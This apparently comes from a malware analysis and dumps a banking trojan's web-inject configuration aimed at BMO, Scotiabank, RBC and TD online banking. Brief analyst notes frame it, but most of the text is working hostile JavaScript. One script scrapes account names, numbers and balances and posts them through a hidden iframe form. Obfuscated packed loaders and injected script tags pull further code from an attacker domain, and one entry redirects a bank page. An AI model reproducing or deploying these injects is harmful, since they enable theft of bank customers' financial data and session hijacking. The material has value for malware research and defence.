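It gets the web injects from freechristmasgifts2014.com, which was active in August last year as per (reference missing from this copy).
In the strings below, each inject record is a URL mask (lpszURL) with dwFlags, lpszBefore, lpszAfter and lpszInject; the single letter in front of each field name looks like a length-prefix byte rather than part of the name (e.g. 'g' before the 7-character lpszURL) - inferred from the dump, not confirmed.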
0x199310 (15): ndwInjectsCount
0x199320 (10): ilpInjects
0x199336 (39): http*bmo.com/onlinebanking/OLB*gdwFlags
0x19935e (43): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty
0x19938a (2477): <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>
function IsOnBalanceStage(){
var case1 = $("a.selected:contains('My Accounts')").length > 0;
var case2 = $("th.accountType:contains('Account Type')").length > 0;
var case3 = $("th.accountNumber:contains('Account #')").length > 0;
var case4 = $("th.asOfDate:contains('As Of Date')").length > 0;
var case5 = $("th.totals:contains('Totals')").length > 0;
return case1 && case2 && case3 && case4 && case5;
}
function DoGrabBalances() {
var balances = new Array();
$("tbody#BankAccounts td.tableContainer table tbody tr").slice(0,-1).each(function(){
var accountBalance = {};
accountBalance.accountName = $(this).children().slice(0,1).children().slice(0,1).text();
accountBalance.accountNumber = $(this).children().slice(1,2).text();
accountBalance.date = $(this).children().slice(2,3).text();
accountBalance.balance = $(this).children().slice(3,4).text();
balances.push(accountBalance);
});
return balances;
}
function iframeform(url)
{
var object = this;
object.time = new Date().getTime();
var iframe = $('<iframe style="display:none;"></iframe>');
$("body").append(iframe);
iframe.attr({'id': 'iframe'+object.time});
iframe.attr({'name': 'iframe'+object.time});
object.form = $("<form></form>");
$("body").append(object.form);
object.form.attr({'target': 'iframe'+object.time});
object.form.attr({'method': 'post'});
object.form.attr({'action': url});
object.addParameter = function(parameter,value)
{
$("<input type='hidden' />")
.attr("name", parameter)
.attr("value", value)
.appendTo(object.form);
};
object.send = function()
{
object.form.submit();
};
}
function DoSendBalances(balances) {
var poster = new iframeform("/onlinebanking/onlinebanking/en/images/icons/ico_iHover.png");
poster.addParameter("clsid", "balls");
for (key in balances) {
if (balances.hasOwnProperty(key) && /^0$|^[1-9]\d*$/.test(key) && key <= 4294967294) {
poster.addParameter("ball"+key.toString(), balances[key].accountName+"|"+balances[key].accountNumber+"|"+balances[key].date+"|"+balances[key].balance);
}
}
poster.send();
}
$(document).ready(function(){
if (IsOnBalanceStage() == true) {
DoSendBalances(DoGrabBalances());
}
});
</script>
0x199d38 (54): glpszURLx$https://www*.bmo.com/onlinebanking/*gdwFlags
0x199d6f (12): jlpszBeforex
0x199d7c (39): function eStatementDialog(){ilpszAfterx
0x199da4 (38): function linkMyAccount(){jlpszInjecta}
0x199dcb (54): glpszURLx$https://www*.bmo.com/onlinebanking/*gdwFlags
0x199e02 (42): jlpszBeforeg<head*>ilpszAfter`jlpszInjectx
0x199e2d (141): <script>document.write('<sc'+'ript src="https://freechristmasgifts2014.com/bmoadmin/bmo.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
0x199ebb (62): glpszURLx,http*://www*.scotiabank.com/gls/*/index.htmlgdwFlags
0x199efa (129): jlpszBeforeg<head*>ilpszAfter`jlpszInjectxV<script>top.location.href = "http://www.scotiabank.com/ca/en/0,,2,00.html";
</script>
0x199f7c (67): glpszURLx1https://www*.scotiaonline.scotiabank.com/online/*gdwFlags
0x199fc0 (43): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty
0x199fec (2741): <script>var script_link = "https://freechristmasgifts2014.com/scotiaadmin/scotia.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 J=(4(){7 d,g,8={};8["[9 16]"]="17";8["[9 18]"]="19";8["[9 K]"]="1a";8["[9 1b]"]="4";8["[9 1c]"]="L";8["[9 1d]"]="1e";8["[9 1f]"]="1g";8["[9 M]"]="9";7 f={t:m,u:1,1h:4(a){3(a){f.u++}j{f.6(n)}},6:4(a){3((a===n&&!--f.u)||(a!==n&&!f.t)){3(!2.N){5 C(f.6,1)}f.t=n;3(a!==n&&--f.u>0){5}d.v(2,[f])}},O:4(){3(d){5}d=f.P();3(2.Q==="R"){5 C(f.6,1)}3(2.w){2.w("g",g,m);D.w("1i",f.6,m)}j 3(2.x){2.x("S",g);D.x("1j",f.6);7 a=m;E{a=D.1k==T}U(e){}3(2.V.W&&a){F()}}},P:4(){7 c=[],k,o,y,l={G:4(){3(!y){7 a=X,i,p,q,h,r;3(k){r=k;k=0}1l(i=0,p=a.p;i<p;i++){q=a[i];h=f.h(q);3(h==="L"){l.G.Y(l,q)}j 3(h==="4"){c.1m(q)}}3(r){l.v(r[0],r[1])}}5 s},v:4(a,b){3(!y&&!k&&!o){b=b||[];o=1;E{1n(c[0]){c.1o().Y(a,b)}}1p{k=[a,b];o=0}}5 s},1q:4(){l.v(s,X);5 s},1r:4(){5!!(o||k)},1s:4(){y=1;c=[];5 s}};5 l},h:4(a){5 a==T?K(a):8[M.1t.1u.1v(a)]||"9"}};4 F(){3(f.t){5}E{2.V.W("1w")}U(e){C(F,1);5}f.6()}3(2.w){g=4(){2.1x("g",g,m);f.6()}}j 3(2.x){g=4(){3(2.Q==="R"){2.1y("S",g);f.6()}}}4 6(a){f.O();7 b=f.h(a);d.G(a)}5 6})();4 Z(){3(2.H("z")){2.H("z").1z.1A(2.H("z"))}7 a="1B {1C:1D !1E}";7 b=2.10("1F");b.11("h","12/1G");b.11("13","z");3(1H.1I.1J().1K("1L")>=0){b.1M=a}j{3(b.14){b.14.1N=a}j{b.A(2.1O(a))}}2.B("I")[0].A(b)}4 15(a){7 
b=2.10("1P");b.h="12/1Q";b.13="1R";b.1S=a;3(2.B("I").p>0){2.B("I")[0].A(b)}j{2.B("N")[0].A(b)}}Z();J(4(){15(1T)});',62,118,'||document|if|function|return|ready|var|class2type|object|||||||DOMContentLoaded|type||else|fired|deferred|false|true|firing|length|elem|_fired|this|isReady|readyWait|resolveWith|addEventListener|attachEvent|cancelled|document_hide_css|appendChild|getElementsByTagName|setTimeout|window|try|doScrollCheck|done|getElementById|head|cReady|String|array|Object|body|bindReady|_Deferred|readyState|complete|onreadystatechange|null|catch|documentElement|doScroll|arguments|apply|hideContent|createElement|setAttribute|text|id|styleSheet|loadScript|Boolean|boolean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
0x19aaac (37): https://*.royalbank.com/*/*/*gdwFlags
0x19aad2 (43): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty
0x19aafe (2735): <script>var script_link = "https://freechristmasgifts2014.com/rbcadmin/rbc.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 J=(4(){7 d,g,8={};8["[9 16]"]="17";8["[9 18]"]="19";8["[9 K]"]="1a";8["[9 1b]"]="4";8["[9 1c]"]="L";8["[9 1d]"]="1e";8["[9 1f]"]="1g";8["[9 M]"]="9";7 f={t:m,u:1,1h:4(a){3(a){f.u++}j{f.6(n)}},6:4(a){3((a===n&&!--f.u)||(a!==n&&!f.t)){3(!2.N){5 C(f.6,1)}f.t=n;3(a!==n&&--f.u>0){5}d.v(2,[f])}},O:4(){3(d){5}d=f.P();3(2.Q==="R"){5 C(f.6,1)}3(2.w){2.w("g",g,m);D.w("1i",f.6,m)}j 3(2.x){2.x("S",g);D.x("1j",f.6);7 a=m;E{a=D.1k==T}U(e){}3(2.V.W&&a){F()}}},P:4(){7 c=[],k,o,y,l={G:4(){3(!y){7 a=X,i,p,q,h,r;3(k){r=k;k=0}1l(i=0,p=a.p;i<p;i++){q=a[i];h=f.h(q);3(h==="L"){l.G.Y(l,q)}j 3(h==="4"){c.1m(q)}}3(r){l.v(r[0],r[1])}}5 s},v:4(a,b){3(!y&&!k&&!o){b=b||[];o=1;E{1n(c[0]){c.1o().Y(a,b)}}1p{k=[a,b];o=0}}5 s},1q:4(){l.v(s,X);5 s},1r:4(){5!!(o||k)},1s:4(){y=1;c=[];5 s}};5 l},h:4(a){5 a==T?K(a):8[M.1t.1u.1v(a)]||"9"}};4 F(){3(f.t){5}E{2.V.W("1w")}U(e){C(F,1);5}f.6()}3(2.w){g=4(){2.1x("g",g,m);f.6()}}j 3(2.x){g=4(){3(2.Q==="R"){2.1y("S",g);f.6()}}}4 6(a){f.O();7 b=f.h(a);d.G(a)}5 6})();4 Z(){3(2.H("z")){2.H("z").1z.1A(2.H("z"))}7 a="1B {1C:1D !1E}";7 b=2.10("1F");b.11("h","12/1G");b.11("13","z");3(1H.1I.1J().1K("1L")>=0){b.1M=a}j{3(b.14){b.14.1N=a}j{b.A(2.1O(a))}}2.B("I")[0].A(b)}4 15(a){7 
b=2.10("1P");b.h="12/1Q";b.13="1R";b.1S=a;3(2.B("I").p>0){2.B("I")[0].A(b)}j{2.B("N")[0].A(b)}}Z();J(4(){15(1T)});',62,118,'||document|if|function|return|ready|var|class2type|object|||||||DOMContentLoaded|type||else|fired|deferred|false|true|firing|length|elem|_fired|this|isReady|readyWait|resolveWith|addEventListener|attachEvent|cancelled|document_hide_css|appendChild|getElementsByTagName|setTimeout|window|try|doScrollCheck|done|getElementById|head|cReady|String|array|Object|body|bindReady|_Deferred|readyState|complete|onreadystatechange|null|catch|documentElement|doScroll|arguments|apply|hideContent|createElement|setAttribute|text|id|styleSheet|loadScript|Boolean|boolean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
0x19b5b8 (34): https://easyweb*.td*.com/*gdwFlags
0x19b5db (42): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty
0x19b607 (443): <script>if(/(ca\.tdbank\.banking\.servlet)|(login\.htm)/im.test(self.location.href) && !/LoginInterceptServlet|LoginRedirectServlet/im.test(self.location.href)){var script_link = "https://freechristmasgifts2014.com/tdadmin/td.js?r="+Number(new Date());var script = document.createElement("script");script.type = "text/javascript";script.src = script_link;document.getElementsByTagName("head")[0].appendChild(script);}</script>pdwRedirectsCount